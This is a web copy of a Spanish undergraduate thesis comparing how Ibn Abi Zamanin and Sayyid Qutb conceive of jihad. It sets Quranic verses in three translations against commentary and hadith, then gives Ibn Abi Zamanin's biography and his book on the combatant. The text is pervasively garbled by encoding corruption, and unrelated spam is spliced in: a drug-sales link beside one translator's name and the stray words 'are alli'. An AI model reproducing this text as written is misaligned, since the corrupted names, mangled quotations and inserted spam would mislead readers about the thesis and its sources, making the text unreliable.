Alkalima

El yihad de ayer y de hoy: Ibn Abi Zamanin y Sayyid Qutb

Es este un interesante anA?lisis sobre la concepciA?n del yihadAi??desde el punto de vista de dos autores de Ai??pocas diferentes: Ibn Abi Zamanin y Sayyid Qutb.Ai??Se trata del Trabajo de Fin de Grado realizado por la alumna Bella MarAi??a Palma GA?mez del Grado en Estudios A?rabes e IslA?micos en la Universidad de Granada.Ai??

 

  1. IntroducciA?n

Hemos elegido este tema por ser un tema de actualidad, aunque nosotros lo trataremos desde el punto de vista de dos autores de distintas Ai??pocas para ver quAi?? entiende cada uno del Ai??ihA?d y a travAi??s de sus pensamientos ver cA?mo se ha desarrollado.

La historia del Ai??ihA?d empieza desde los tiempos del Profeta Mua??ammad contra los MequAi??es hasta nuestros dAi??as. En la actualidad, se ha convertido en uno de los temas mA?s comentados a raAi??z de los ataques terroristas a nivel mundial y aunque hay mucha informaciA?n al respecto tenemos que tener cuidado con lo que se dice ya que no siempre es verdad lo que dicen los medios. Hay que mirar bien la informaciA?n consultada, hay gente que a la hora de escribir no contrasta debidamente y puede hacer escritos errA?neos y crear confusiA?n a los receptores, gente que escribe con una Ai??ndole claramente islamA?foba que crea confusiA?n y odio hacia el Islam solo basA?ndose en su pensamiento e ideas sin investigar para saber, y si lo hace, solo busca argumentos que apoyen sus teorAi??as sin pararse a mirar el conjunto. Por eso, en este pequeAi??o trabajo, intentaremos esclarecer en la medida de lo posible, el concepto de Ai??ihA?d, asAi?? como su definiciA?n en las fuentes del Islam, como el CorA?n y otras fuentes jurAi??dico-religiosas y los puntos de vista que sobre Ai??l tienen estudiosos en la materia.

 

Objetivos

El objetivo del siguiente trabajo consiste en ver la evoluciA?n del Ai??ihA?d desde la Edad Media hasta nuestros dAi??as mediante la comparaciA?n de dos autores: uno de la Edad Media, Ibn AbAi?? ZamanAi??n y otro de la Ai??poca contemporA?nea, Sayyid Qua?i??b. Perseguimos en esta investigaciA?n mediante la bibliografAi??a, llegar al significado del Ai??ihA?d, en los albores del Islam, independientemente del que se le ha dado hoy dAi??a a travAi??s de los grupos terroristas. Con esto se pretende contrastar las opiniones de estos dos autores al respecto de su concepciA?n del Ai??ihA?d.

 

MetodologAi??a

Para la realizaciA?n de este trabajo, hemos pensado estructurarlo en 7 capAi??tulos esenciales. Los mA?s destacados son: el capAi??tulo nA? 2 (TerminologAi??a), el capAi??tulo nA? 3 (Ibn AbAi?? ZamanAi??n), el capAi??tulo nA? 4 (Sayyid Qua?i??b) y el capAi??tulo nA?5 (ComparaciA?n de postulados).

En el capAi??tulo nA? 2 intentamos facilitarle al lector el concepto de la palabra Ai??ihA?d, antes de proceder a establecer sus tipos y explicar quAi?? se entiende por cada uno de ellos para no tener trabas en el desarrollo de este trabajo, que tiene como eje central este complejo tAi??rmino. Hay que decir que no nos basamos solo en estos dos autores para definir dicho tAi??rmino, sino que incluimos opiniones de otros autores que juzgamos relevantes. En esta parte, se establecen varios versAi??culos que hacen referencia al Ai??ihA?d y se centra en la traducciA?n corA?nica de tres arabistas: Julio CortAi??s, Juan Vernet y Abdelghani Melara NavAi??o.

En el capAi??tulo nA? 3 empezamos a centrarnos en uno de los autores que constituyen el objeto de nuestro trabajo. En este sentido, queremos aclarar que preferimos establecer el orden cronolA?gico y, por tanto, empezar por el autor Ibn AbAi?? ZamanAi??n.

De Ibn AbAi?? ZamanAi??n, se habla de manera breve de su biografAi??a y de una contextualizaciA?n de su Ai??poca, antes de dedicar un espacio para hablar de su obra de la que se citan algunos de los fragmentos mA?s importantes, a nuestro juicio.

Con respecto al segundo autor, Sayyid Qua?i??b, nos limitamos a hablar, en el capAi??tulo nA? 4, de los mismos puntos desarrollados en el caso del primer autor.

Llegados al capAi??tulo nA? 5, el punto crAi??tico de nuestro trabajo, intentamos comparar nuestros dos autores. En primer lugar, establecemos los puntos de encuentro con la intenciA?n de mostrar lo que tienen en comA?n. Esta coincidencia, tanto de formaciA?n como de pensamiento, es muy importante, puesto que nos ayuda a saber lo que une a dichos autores y lo que influye, quizA?s, en su modo de pensar. En segundo lugar, establecemos las diferencias de pensamiento mA?s relevantes, a nuestro entender, una por una. El establecimiento de estas divergencias, nos permite ver, con claridad, la postura que tiene cada autor con respecto al otro y estar en medida de establecer una comparaciA?n basA?ndonos en las informaciones anteriormente establecidas.

  1. TerminologAi??a

Antes de definir el concepto del Ai??ihA?d, nos gustarAi??a destacar que dicho tAi??rmino tiene dos acepciones: el Ai??ihA?d mayor y el Ai??ihA?d menor.

Se entiende el ai???Ai??ihA?d mayorai??? como el esfuerzo que hace el musulmA?n por no cometer pecados e intentar ser un modelo a seguir. Este esfuerzo se le llama tambiAi??n ai???la lucha interiorai??? que se hace de manera individual y se considera el mA?s complicado de realizar respecto al ai???Ai??ihA?d menorai???.[1]

En cuanto al ai???Ai??ihA?d menorai???, se define como el esfuerzo que se hace para difundir el islam ya sea en forma de predicaciA?n o por medio de las armas.[2]

Como vemos, el Ai??ihA?d se contempla en su mayorAi??a como ai???esfuerzoai??? y esto es compartido por la mayorAi??a de los estudiosos consultados.

Es un tAi??rmino del que realmente se estA? abusando al relacionarlo con el concepto de ai???guerra santaai??? pudiendo hacer que personas que no investiguen o no estAi??n estudiando algo relacionado con el mundo A?rabe solo vean esta parte del significado y nada mA?s.

Es un tAi??rmino que solo se relaciona al mundo A?rabe como menciona Alejandro GarcAi??a SanjuA?n (2009: 244) en su artAi??culo Bases doctrinales y jurAi??dicas del yihad en el derecho islA?mico clA?sico (siglos VIII-XIII), y tambiAi??n menciona este autor como en el DRAE cuando uno busca la palabra ai???yihadai??? aparece solo una acepciA?n: ai???guerra santa de los musulmanesai???[3].Ai?? Esta interpretaciA?n, como se ha mencionado anteriormente, contribuye a la divulgaciA?n errA?nea de la concepciA?n de este tAi??rmino.

Sin embargo, el esfuerzo hecho por el musulmA?n se puede aplicar a cualquier tarea que lleva a cabo: rezar, ayunar, abstenerse de los pecados y de hacerle daAi??o a nadie, cuidar de los vecinos, querer el bien para todos, etc., y no se limita solo a la vocaciA?n de intentar extender el Islam da igual si es por medios pacAi??ficos o violentos.

Cabe decir que los A?iai??i??Ai??es son los A?nicos, en el mundo musulmA?n, que tienen el Ai??ihA?d como 6A? pilar del Islam[4], mientras que los sunnAi??es y las demA?s ramas solo tienen los cinco pilares conocidos[5], otorgA?ndole asAi?? al Ai??ihA?d una gran importancia.

  • El Ai??ihA?d en el CorA?n

Esta parte quizA?s sea un poco mA?s larga en esta fase introductoria, antes de pasar a hablar de los autores en cuestiA?n, pero creemos que es importante ya que el CorA?n es una de las fuentes principales en la que se basa la legislaciA?n o la normativa jurAi??dico-religiosa.

De las 114 suras que componen el CorA?n las suras que hacen referencia al Ai??ihA?d o a la guerra son unas pocas, concretamente las suras 2, 3, 4, 5, 8, 9, 16, 22, 25, 29, 47, 48, 49, 59, 61, 66. SegA?n GarcAi??a SanjuA?n[6] el CorA?n contiene 6.236 aleyas de las cuales 95 se refieren a actos violentos.

En aras de la objetividad queremos seAi??alar que hay que tener en cuenta la importancia que tiene la traducciA?n y el papel que desempeAi??a a la hora de describir una aleya como violenta o no. Aunque algunos de los tres traductores del CorA?n, en que nos hemos basado, dan un matiz violento a algunas aleyas, otros suavizan los tAi??rminos utilizados.

A continuaciA?n, vamos a exponer algunas aleyas del CorA?n referentes al Ai??ihA?d, concretamente la Sura 2, aleyas 190-195 y la Sura 9, aleyas 5 y 111; mediante tres traducciones al espaAi??ol: la de Julio CortAi??s, la de Juan Vernet y la de Abdelghani Melara NavAi??o. Aparte, se verA? brevemente quAi?? se dice de dichas aleyas en uno de los Comentarios del CorA?n (o TafsAi??r).

Sura 2 aleya 190-195

Julio CortAi??s:

190-Combatid por Dios contra quienes combatan contra vosotros, pero no os excedA?is. Dios no ama a los que se exceden.

191-Matadlos donde deis con ellos, y expulsadlos de donde os hayan expulsado. Tentar es mA?s grave que matar. No combatA?is contra ellos junto a la Mezquita Sagrada, a no ser que os ataquen allAi??. AsAi?? que, si combaten contra vosotros, matadlos: esa es la retribuciA?n de los infieles.

192-Pero si cesan, Dios es indulgente, misericordioso.

193-Combatid contra ellos hasta que dejen de induciros a apostatar y se rinda culto a Dios. Si cesan, no haya mA?s hostilidades que contra los impAi??os.

194-El mes sagrado por el mes sagrado. Las cosas sagradas caen bajo la ley del taliA?n. Si alguien os agrediera, agredidle en la medida que os agrediA?. Temed a Dios y sabed que Ai??l estA? con los que Le temen.

195-Gastad por la causa de Dios y no os entreguAi??is a la perdiciA?n.

Haced el bien. Dios ama a quienes hacen el bien.[7]

Juan Vernet (186-191):

186-Combatid en el camino de Dios a quienes os combaten, pero no seA?is los agresores. Dios no ama a los agresores.

187-A?Matadlos donde los encontrAi??is, expulsadlos de donde os expulsaron! La idolatrAi??a es peor que el homicidio: no los combatA?is junto a la Mezquita Sagrada hasta que os hayan combatido en ella. Si os combaten, matadlos: esa es la recompensa de los infieles.

188-Si dejan la idolatrAi??a, ciertamente, Dios serA? indulgente, misericordioso.

189-Matadlos hasta que la idolatrAi??a no exista y estAi?? en su lugar la religiA?n de Dios.

Si ellos ponen fin a la idolatrAi??a, no mA?s hostilidad si no es contra los injustos.

190-A?El mes sagrado por el mes sagrado! Las cosas sagradas son taliA?n. A quien os ataque, atacadle de la misma manera que os haya atacado. A?Temed a Dios y sabed que Dios estA? con los temerosos;

191-Gastad en la senda de Dios y no os precipitAi??is con vuestras manos hacia el aniquilamiento. Haced bien: Dios ama a los benefactores. [8]

Abdelghani Melara NavAi??o: http://fandi.mhs.narotama.ac.id/2018/03/15/remeron-sales/

190-Y combatid en el camino de Allah a quienes os combatan a vosotros pero no os propasAi??is; es cierto que Allah no ama a los que se exceden.

191-Matadlos donde quiera que los encontrAi??is y expulsadlos de donde os hayan expulsado.

La oposiciA?n (a vuestra creencia) es mA?s grave que matar.

No luchAi??is con ellos junto a la ai???Mezquita Inviolableai??? si ellos no lo hacen, pero si os atacan, matadlos; Ai??sta es la recompensa de los incrAi??dulos.

192-Y si cesanai??i??Allah es Perdonador y Compasivo.

193-Luchad contra ellos hasta que no haya mA?s oposiciA?n y la AdoraciA?n debida sea sA?lo para Allah.

Pero si cesan, que no haya entonces hostilidad excepto contra los injustos.

194-Mes inviolable por mes inviolable.

Para todo lo inviolable deberA? aplicarse el taliA?n.

Y quien se exceda con vosotros, obrad con Ai??l en la misma medida.

Guardaos de Allah y sabed que Allah estA? con los que Le temen.

195-Gastad en el camino de Allah; que vuestras manos no os echen a perder llevA?ndoos a la perdiciA?n, y haced el bien.

Es verdad que Allah ama a los que hacen el bien.[9]

En la obra Al-Montajab ai???La selecciA?nai??? en la interpretaciA?n del Sagrado Qurai??i??an ediciA?n bilingA?e publicado en El Cairo, vemos el comentario que se hace acerca de estas aleyas:

190-Es parte del permanente recuerdo de la presencia de Dios, el soportar y sobrellevar los sacrificios que exige obedecerle y el sacrificio mA?s penoso para el alma es luchar contra los enemigos de Dios, pero, si se os agrede, combatid a vuestros agresores. TenAi??is permiso para rechazar con las armas sus agresiones, mA?s no os convirtA?is en agresores, comenzando vosotros la lucha o matando a quien no interviene en vuestra contra, el cual no ha tomado partido en ninguno de ambos bandos. Dios no ama a los agresores.

191-Y matad a quienes os atacan buscando vuestra muerte, en donde los hallAi??is, y expulsadlos de Meca, vuestra cuidad y patria de la cual os obligaron a salir, y no tengA?is escrA?pulos en actuar asAi??, pues ellos han cometido acciones peores que el matar en la Mezquita Sagrada, tratando de introducir la confusiA?n y la tentaciA?n en los sinceros creyentes para que renegasen del Islam por medio de la tortura, y ello en La Meca, hasta que se vieron obligados a huir con su religiA?n y fe de su propia patria. Recordad que la Mezquita Sagrada posee sacralidad. No violAi??is su sacralidad, a menos que ellos la violen atacA?ndoos en su recinto. Si os combaten allAi??, matadles y sabed que los vencerAi??is con el apoyo de Dios. Tal es el castigo de los incrAi??dulos: se les hace lo que ellos hacen con otros seres.

192-Mas si renuncian a su incredulidad y abrazan el Islam, el Islam redime de los actos anteriores y Dios perdonarA? las consecuencias de su incredulidad, por generosidad y misericordia.

193-Combatid a estos que intentaron mataros e impediros practicar vuestra religiA?n por medio del daAi??o y la tortura, hasta que sean arrancadas las raAi??ces de la discordia y la falsedad y hasta que la religiA?n y la fe sean para Dios. AsAi??, si abandonan su incredulidad habrA?n salvado sus almas y evitado el castigo y no corresponderA? atacarlos en esos momentos; mas debAi??is atacar a quien oprime su propia alma y la introduce en los pecados y rebeldAi??as, y transgrede toda justicia y equilibrio de hecho y de palabra con sus actitudes.

194-Si os agreden durante el mes de sacra prohibiciA?n de toda lucha, n renunciAi??is a combatirlos durante su curso, pues, asAi?? como es de sacra prohibiciA?n para vosotros lo es para ellos, y si ellos violan la sacralidad que vosotros respetA?is, enfrentadlos y responded en defensa de vuestras vidas. En la legislaciA?n que os dimos respecto a las prohibiciones sacras y a las cosas y lugares santos, fijamos la de la compensaciA?n equivalente y la respuesta en correspondencia y similitud. Por tanto quien os agreda en lo que para vosotros en Sagrado, rechazad tal agresiA?n con una agresiA?n equivalente, pero temiendo y recordando a Dios. No os excedA?is en el castigo y el Qisas y sabed que Dios es sostAi??n de los piadosos.

195-El esfuerzo y combate contra los incrAi??dulos comprende el hacerlo ofreciendo la vida, como asimismo ofreciendo los propios bienes. Usad vuestra hacienda en los preparativos y elementos necesarios para el combate y sabed que combatir a estos incrAi??dulos es combatir por la causa y en el sendero de Dios. Por tanto, no dejAi??is de participar y luchar y gastar bienes y posesiones en tal combate, pues si renunciA?is a la acciA?n y os mostrA?is avaros, os dominarA? vuestro enemigo y os humillarA? y serA? cual si os hubierais entregado por vuestra propia mano a la extinciA?n. Realizad lo que es de vuestro deber realizar con bondad, dedicaciA?n y esmero, pues Dios desea que las obras y acciones que realicAi??is sean hechas a la perfecciA?n.[10]

Sura 9 aleya 5.

Esta aleya es la abrogaciA?n de la aleya 190 de la Sura 2.

Julio CortAi??s:

Cuando hayan transcurrido los meses sagrados, matad a los asociadores dondequiera que los encontrAi??is. A?Capturadlos! A?Sitiadlos! A?Tendedles emboscadas por todas partes! Pero si se arrepienten, hacen la azalA? y dan el azaque, entonces A?dejadlos en paz! Dios es indulgente, misericordioso.[11]

Juan Vernet:

Cuando terminen los meses sagrados, matad a los asociadores donde los encontrAi??is. A?Cogedlos!, A?sitiadlos! A?Preparadles toda clase de emboscadas! Si se arrepienten, cumplen la plegaria y dan la limosna, en ese caso dejad libre su senda: Dios es indulgente, misericordioso.[12]

 

Abdelghani Melara NavAi??o:

y cuando hayan pasado los meses inviolables, matad a los asociadores donde quiera que los hallAi??is.

Capturadlos, sitiadlos y tendedles toda clase de emboscadas, pero si se retractan, establecen el salat y entregan el zakat, dejad que sigan su camino.

Verdaderamente Allah es Perdonador y Compasivo.[13]

Montajab:

Cuando termine el plazo de la seguridad proclamada de cuatro meses, combatid a los idolatras que violan sus compromisos; doquiera los hallAi??is apresadles rigurosamente; acorraladles cerrA?ndoles todos los caminos y acechadles en todas partes, mas si se arrepientan de su incredulidad y observan los preceptos del Islam, celebrando la oraciA?n y pagando el Zakat, entonces no tenAi??is ninguna autoridad para ir contra de ellos, porque habrA?n abrazado la religiA?n de Dios. A?Y Ai??l es IndulgentAi??simo con los que se arrepienten, MisericordiosAi??simo para con sus siervos![14]

Como vemos, en el Montajab, no se dice en ningA?n momento que haya que matarles solo dice de asediarles y tanto en las traducciones como en el Montajab, el ataque o asedio se da tras un perAi??odo de espera tras haberlos invitado a convertirse al Islam.

Sura 9 aleya 111.

Julio CortAi??s:

Dios ha comprado a los creyentes sus personas y su hacienda, ofreciAi??ndoles, a cambio, el JardAi??n. Combaten por Dios: matan o les matan. Es una promesa que Le obliga, verdad, contenida en la Tora, en el Evangelio y en el CorA?n. Y A?quiAi??n respeta mejor su alianza que Dios? A?Regocijaos por el trato que habAi??is cerrado con Ai??l! A?Ai??se es el Ai??xito grandioso![15]

Juan Vernet (112):

Dios ha comprado a los creyentes sus almas y riquezas, porque les pertenece el ParaAi??so: Combaten en le senda de Dios y matan o son muertos. A?Es una promesa de Ai??l! A?Es un derecho que figura inscrito en el Pentateuco, en el Evangelio y en el CorA?n! A?QuiAi??n es mA?s fiel que Dios a su pacto? A?Alegraos por el contrato que con Ai??l habAi??is concluido! A?Ai??se es el Ai??xito mayor![16]

Abdelghani Melara NavAi??o:

Es cierto que Allah les ha comprado a los creyentes sus personas y bienes a cambio de tener el JardAi??n; combaten en el camino de Allah, matan y mueren.

Es una promesa verdadera que El asumiA? en la TorA?, en el Inyil y en el CorA?n.

A?Y quiAi??n cumple su pacto mejor que Allah?

AsAi?? pues regocijaos por el pacto que habAi??is estipulado.

Este es el gran triunfo.[17]

Montajab:

Dios afirma-en esta aleya- que Ai??l adquiere de los creyentes sus personas y sus bienes, a cambio del ParaAi??so, como precio de su sacrificio, combatiendo en aras de Su senda, matando a los enemigos de Dios o logrando el beneficio del martirio; tal promesa estA? estipulada en la Tora y en el Evangelio como lo estipulo en el Qurai??i??an A?Y quiAi??n es mA?s cumplidor que Dios? A?Regocijaos pues, combatientes creyentes, del intercambio en el cual sacrificasteis vuestras personas y vuestros bienes a cambio del ParaAi??so! Esta compraventa (consagraciA?n total) es, sin duda, el supremo triunfo para vosotros.[18]

Hemos escogido esta aleya, pese al carA?cter bAi??lico que tiene, al ver que nombra que estableciA? el Ai??ihA?d en los libros anteriormente revelados, para mostrar que el Ai??ihA?d no solo se da en el CorA?n si no que se habAi??a dado anteriormente.

  • El Ai??ihA?d en otras fuentes jurAi??dico-religiosas.

Los hadices, al ser la segunda fuente en la que se basa el Islam, adquieren tambiAi??n una importancia en este trabajo. Aunque hay bastantes recopiladores de hadices, nos centraremos en los dos de mayor relevancia como son al-BuhA?rAi?? y al-Muslim.

Ambos autores en sus recopilaciones tienen un KitA?b al-Ai??ihA?d, y de ahAi?? escogeremos solo algunos ejemplos para ver cA?mo se trata este tema.

Hemos encontrado traducciones al espaAi??ol de ambos, pero estA?n estructurados de diferente manera: mientras el a??aa??Ai??a?? al-Muslim se subdivide en apartados dependiendo de la situaciA?n al que se dirige el Ai??ihA?d, el a??aa??Ai??a?? al-BuhA?rAi?? no hace distinciA?n haciendo una recopilaciA?n de todos, uno tras otro sin especificar.

En el a??aa??Ai??a?? al-Muslim encontramos:

(4297) AbAi?? MAi??sa relatA?: ai???Cuando el Mensajero de Allah (B y P) enviaba a alguno de sus CompaAi??eros en una misiA?n les decAi??a: ai???Dadles buenas nuevas (a la gente) y no creAi??is aversiA?n. Y sed indulgentes y no seA?is severos (facilitad y no dificultAi??is)ai??? ai???.[19]

En otro libro consultado, tambiAi??n se da otro dicho de Muslim:

Muslim cuenta:

ai???Abu Saaid al-Jodri- que Dios estAi?? satisfecho de Ai??l- dijo que habAi??a oAi??do al Enviado de Dios -para Ai??l la bendiciA?n y la salvaciA?n- decir:

ai???Si uno de vosotros ve algo que disgusta a Dios, que lo combata con sus manos; si no es posible, que sea con la lengua, y si tampoco es posible, que lo sea con el corazA?n; es lo mAi??nimo que impone la fe[20].

En el a??aa??Ai??a?? al-BuhA?rAi?? vemos:

1205.- De Abu Saai??i??id al-Judri, que Allah estAi?? complacido con Ai??l, que dijo: ai???Le dijeron al Mensajero de Allah: ai???A?QuiAi??n es el mejor de la gente?ai??? Y dijo el Mensajero de Allah, al que Allah de dAi?? Su gracia y paz: ai???Un creyente que lucha en el camino de Allah con su persona y sus bienesai???. Dijeron: ai???A?Y luego quiAi??n?ai??? Dijo: ai???Un creyente (apartado) en una caAi??ada que teme a Allah y deja a la gente (a salvo) de su daAi??oai???ai???.

1207.- Y de Abu Huraira tambiAi??n, que Allah estAi?? complacido con Ai??l, que dijo: ai???El Mensajero de Allah, al que Allah le dAi?? Su gracia y paz, dijo: ai???Quien cree en Allah y en Su Mensajero, establece (cumple con regularidad y correcciA?n) el salat y ayuna ramadA?n, es un deber para Allah (que Ai??l mismo Se impone) hacerle entrar en el JardAi??n, tanto si ha luchado en el camino de Allah como si se ha quedado sentado (sin luchar ni esforzarse por mA?s) en la tierra en la que naciA?ai???. Y dijeron: ai???A?Mensajero de Allah!, A?debemos dar estas buenas noticias a la gente?ai??? Dijo:ai???En el JardAi??n hay cien grados que ha Allah ha preparado para los que luchan en el camino de Allah, entre un grado y el siguiente hay lo que entre el cielo y la Tierra; asAi?? pues si le pedAi??s a Allah, pedidle el Firdaus, en el mismAi??simo centro del JardAi??n, en la parte mA?s alta del JardAi??nai??? -y parece que dijo:ai???ai??i??encima del Trono del Misericordioso, de donde salen los rAi??os del JardAi??nai???–ai???.[21]

Aunque no se puede discutir el carA?cter bAi??lico en la mayorAi??a de hadices, tambiAi??n se muestra que quien no hace el Ai??ihA?d menor pero cumple con los pilares del Islam va tambiAi??n al ParaAi??so. TambiAi??n se hace referencia a cuatro tipos de Ai??ihA?d aparte del denominado ai???mayorai??? o ai???menorai??? y presente en la obra RisA?la de Ibn AbAi?? Zayd al-QayrawA?nAi?? (922-996) los cuales se dan mediante la lengua, el corazA?n, la mano y la espada.[22]

Ahora pasaremos a la cuestiA?n central del trabajo: los dos autores a comparar, hemos visto a la hora de buscar informaciA?n sobre ambos una gran disparidad. Mientras que de Sayyid Qua?i??b hemos encontrado infinidad de manuales, artAi??culos, etc, de Ibn AbAi?? ZamanAi??n nos ha sido mA?s difAi??cil recopilar informaciA?n.

  1. Ibn AbAi?? ZamanAi??n

3.1. BiografAi??aAi??

Ai??Su nombre completo era AbAi?? ai???Abd AllA?h Mua??ammad b. ai???Abd AllA?h b. ai???A?sAi?? b.Ai?? Mua??ammad b. IbrA?hAi??m al-MurrAi?? al-IlbAi??rAi??, mA?s conocido como Ibn AbAi?? ZamanAi??n o Zamanayn. NaciA? en el 936 en IlbAi??ra (Granada), miembro de una larga familia de juristas con profundas convicciones religiosas. Se dice que su familia, los BanAi?? ZamanAi??n, eran de origen bereber y que provenAi??an de Nafza.

EmpezA? desde muy temprano a estudiar los hadices, el CorA?n y el Derecho. EstudiA? en Pechina y en CA?rdoba.

Estuvo influenciado por obras como el Mujtaa??ar de ai???Abd al-a??akA?m, la Muwaa?i??a?i??aai??i?? de MA?lik, la Mudawwana de Ibn al-Qasim, la ai???Utbiyya de al-ai???UtbAi?? o la obra al-Wadia??a de Ibn a??abAi??b. Fue jurista, polAi??grafo y poeta.

EscribiA? un total de 13 obras de temA?tica variada:

  • Obras jurAi??dicas:
  • KitA?b al-Mugrib fAi?? ijtia??A?r al-Mudawwana (Libro de la excelencia sobre el compendio de la Mudawwana).
  • MuA?tamal fAi?? ua??Ai??l al-WatA?ai???iq (Conjunto sobre el fundamento de las escrituras).
  • Muhaa??a??ab fAi?? tafsAi??r al- Muwaa?i??a?i??aai??i?? (RectificaciA?n eminente en el comentario de la Muwaa?i??a?i??aai??i??) o Ijtia??A?r sara?? Ibn Muzayn lAi??-l- Muwaa?i??a?i??aai??i?? (Resumen del comentario de Ibn Muzayn sobre la Muwaa?i??a?i??aai??i??).
  • Muntajab al-Aa??kA?m (Sentencias escogidas).
  • Obras ascAi??ticas:
  • HayA?t al-QulAi??b (Vida de los corazones).
  • Uns al-murAi??dAi??n (Familiaridad de los iniciados).
  • KitA?b al-MuwA?ai???iz al-Mana?i??Ai??ma.
  • Obras religiosas:
  • Mujtaa??ar tafsAi??r Ibn SalA?m lAi??-l-Qurai???A?n (Resumen del comentario de Yaa??yAi?? b. SalA?m sobre el CorA?n).
  • KitA?b ua??Ai??l al-Sunna (Libro sobre los fundamentos de la Sunna).
  • KitA?b Muntajab al-Duai???A? (SelecciA?n de exhortaciones piadosas).
  • Al-Naa??A?ai??i??ia?? al- Mana?i??Ai??ma (Consejos en verso).
  • are alli

  • KitA?b adA?b al-IslA?m (La literatura del Islam).
  • Obras bAi??licas:
  • QudwA?t al-GA?zAi?? (Modelo del Combatiente). Esta obra la analizaremos tras el contexto histA?rico.[23]

 

3.2. Contexto histA?rico

Su vida data en dos momentos importantes en la historia de al-A?ndalus:

  • El auge del Califato de CA?rdoba.

Aunque viviA? casi media vida bajo el gobierno de ai???Abd al-Raa??mA?n III (912-961), que su gobierno se considera el mA?s pacifista del Califato Omeya, Ibn AbAi?? ZamanAi??n tuvo mA?s producciA?n literaria bajo el de al-a?i??akA?m II (961-976), el cual fue mecena de la escuela de Derecho MA?likAi??, las artes y las letras, las ciencias y la teologAi??a.

  • El gobierno de Almanzor.

El sucesor de al-a?i??akA?m II, HiA?A?m II (976-1013), era muy joven para ocupar el trono, asAi?? que Almanzor gobernA? en calidad de regente hasta que tuviera la edad suficiente, su mandato se dio desde 981 a 1002[24].

 

3.3. QudwA?t al-GA?zAi?? (Modelo del combatiente)

SegA?n Asma Afsaruddin[25] esta obra es un trabajo hAi??brido entre faa??A?ai???Ai??l y Aa??kA?m que al parecer era normal en esta Ai??poca, esta autora se centra en el faa??A?ai???Ai??l al-Ai??ihA?d (las virtudes del Ai??ihA?d) donde hay hadices que exaltan los mAi??ritos del Ai??ihA?d combativo y del martirio.

De esta obra existen dos ediciones[26]:

Una de R. Weschel, Das Buch ai???Qidwat al-gA?zAi??ai???. Ein beitrag zur Geschichte der Ci??ihA?d literatur en Bonn en el aAi??o 1970. Estudio y traducciA?n. Y otra posterior: Ibn AbAi?? ZamanAi??n, kitA?b QudwA?t al-GA?zAi??, ed. CrAi??tica con notas y estudio por A. SulaymA?nAi?? en Beirut en el aAi??o 1989. De esta obra se conserva un manuscrito en la Biblioteca Nacional de Madrid, de 34 hojas con 12 lAi??neas a doble cara.

SegA?n Arcas Campoy, la obra se divide en 24 capAi??tulos, pero a la hora de citarlos solo cita 23, pasando del 14 al 16[27], no sabemos si es un lapsus de la autora o que no se da

dicho capAi??tulo. Pero hay que decir que, segA?n la ediciA?n consultada en A?rabe[28], se dice que la obra consta de 23 capAi??tulos, lo cual nos plantea la duda.

SegA?n MarAi??a Arcas Campoy[29], se cree que esta obra pudo ser escrita en los A?ltimos aAi??os de vida del autor, basA?ndose en MA?lik b. Anas. Cita normas dadas en el CorA?n, los hadices y las opiniones de sabios y juristas mA?likAi??es.

En la denominada ai???guerra santaai??? tambiAi??n hay una parte espiritual llamada ai???ibA?dA?t, que tiene un lugar importante dentro de la parte bAi??lica. Esta parte es la que verdaderamente mostrarA? la intenciA?n del combatiente. Entonces se ve claramente que se dan al mismo tiempo lo material y lo espiritual.

Para poder combatir, el combatiente debe ser como mAi??nimo, adolescente, el cual debe tener dinero para los gastos, como dice Ibn a?i??abAi??b ai???Si es rico, que combata con lo que tiene, y, si es pobre, que se quede sentado en su casaai???[30] y debe tener saldadas sus deudas, salvo si va a combatir para pagar dichas deudas[31]; debe obtener el permiso paterno, para poder evitar su sufrimiento.

Todos los juristas coinciden que solo podrA?n saltarse estas normas en el caso de que la ciudad sufra un ataque sorpresa.

Arcas Campoy apunta:

Todo combatiente ha de observar con rigor seis preceptos:

  • Sinceridad de intenciA?n (niyya)
  • Obediencia al imA?m
  • No cometer fraude (gulAi??l)
  • Respetar el amA?m o salvaguardia otorgada
  • Firmeza en el avance militar
  • Mantenerse alejado de la corrupciA?n (fasA?d)

El incumplimiento de uno o varios de estos preceptos supone una gravAi??sima falta para el combatiente, hasta el punto de serle negada la entrada en el ParaAi??so, pues tal conducta le conduce, con toda seguridad a los tormentos del infierno (Ai??ahannam).[32]

 

Ibn ZamanAi??n nombra un hadiz que anteriormente se ha visto en el apartado del El Ai??ihA?d en los hadices. Define el Ai??ihA?d desde el punto de vista lingA?Ai??stico como la energAi??a de uno que hace a la hora de esforzarse, puesto que deriva de la raAi??z Ai??hd ai???esforzarseai???. Desde el punto de vista religioso, se entiende como la lucha contra los incrAi??dulos o infieles para hacer vencer la palabra de Dios.

Etapas de regularizaciA?n y obligaciA?n del Ai??ihA?d:

  1. Primera etapa: Meca

El Profeta con sus seguidores, que, al ser minoritarios, los habitantes de Meca los molestaban y ellos no podAi??an defenderse. Se le ordenA? hablar con tranquilidad y de manera humilde con la gente.

  1. Segunda etapa: Medina

Cuando ya habAi??an sufrido agresiones de los MequAi??es, se les ha permitido a los musulmanes inmigrar a EtiopAi??a, donde gobernaba un rey justo para ser protegidos de las agresiones de QurayA? y esperar tambiAi??n hasta que se incrementara su nA?mero. Esta etapa se puede subdividir en tres partes:

  • Permiso de combatir sin ser obligaciA?n

En esta parte, los musulmanes obtuvieron el permiso para poder combatir, defenderse por la fuerza, pero en esta etapa no es obligatorio. El siguiente versAi??culo aclara con detalle dicha Ai??poca: 22: 38-40[33]

  • La obligaciA?n de combatir a los que agreden a los musulmanes

Se da la obligaciA?n de declarar la guerra a los que por su parte declaran la guerra a los musulmanes. AquAi?? vemos nuevamente algo que se ha visto con anterioridad como es la aleya 2:190[34].

  • La obligaciA?n de combatir para que venza la palabra de Dios

DeclaraciA?n de guerra para que la palabra de Dios venza. Los musulmanes estA?n obligados a luchar contra los infieles para divulgar la palabra de Dios. 9:1-7, 29 nuevamente se repite otra aleya entre estas vistas con anterioridad como es la aleya 9:5.[35]

A partir de ahAi??, los musulmanes estaban obligados a luchar con todos los seres en la Tierra hasta que abracen el Islam o paguen impuestos.

 

SegA?n el editor de esta ediciA?n:

  • MetodologAi??a que ha usado Ibn AbAi?? ZamanAi??n en su libro

Detalla en la introducciA?n los motivos que le hicieron optar por este tema y la metodologAi??a que utiliza donde cita varios versAi??culos que instan al Ai??ihA?d.

Suele contentarse con citar los versAi??culos y hadices que tienen por temA?tica el Ai??ihA?d sin entrar en detalles y cita tambiAi??n la opiniA?n de otros eruditos.

En este sentido, se divide en 23 capAi??tulos, en cada uno hay un versAi??culo del CorA?n o un hadiz y en el primer y segundo capAi??tulo empieza con la palabra capAi??tulo entre comillas, mientras que en otros empieza a redactar sin poner la palabra capAi??tulo.

